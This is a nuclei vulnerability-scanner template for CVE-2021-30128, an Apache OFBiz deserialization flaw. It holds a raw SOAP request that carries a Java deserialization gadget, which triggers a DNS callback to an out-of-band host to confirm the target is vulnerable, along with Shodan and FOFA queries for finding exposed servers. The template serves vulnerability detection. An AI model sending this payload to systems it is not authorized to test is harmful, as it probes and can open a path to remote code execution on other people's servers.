nuclei-templates/http/cves/2021/CVE-2021-30128.yaml

id: CVE-2021-30128

info:
  name: Apache OFBiz <17.12.07 - Arbitrary Code Execution
  author: For3stCo1d
  severity: critical
  description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.    
  remediation: |
    Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability.    
  reference:
    - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30128
    - http://www.openwall.com/lists/oss-security/2021/04/27/5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-30128
    cwe-id: CWE-502
    epss-score: 0.59411
    epss-percentile: 0.97756
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: ofbiz
    fofa-query: app="Apache_OFBiz"
    shodan-query: http.html:"ofbiz"
  tags: cve2021,cve,apache,ofbiz,deserialization,rce

http:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
          <soapenv:Header/>
            <soapenv:Body>
              <ser>
                <map-Map>
                  <map-Entry>
                    <map-Key>
                      <cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
                    </map-Key>
                  <map-Value>
                <std-String/>
                </map-Value>
                </map-Entry>
              </map-Map>
              </ser>
            </soapenv:Body>
        </soapenv:Envelope>        

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'value="errorMessage"'
# digest: 4a0a004730450220378972d9f55dda8779aa831590d85f9331f5e4e427991c707692706dd817ebe60221008c5efea71f9e6388f6b558b5224deb9ba7bdc8fc81d19ec3e81a76c431152471:922c64590222798bb761d5b6d8e72950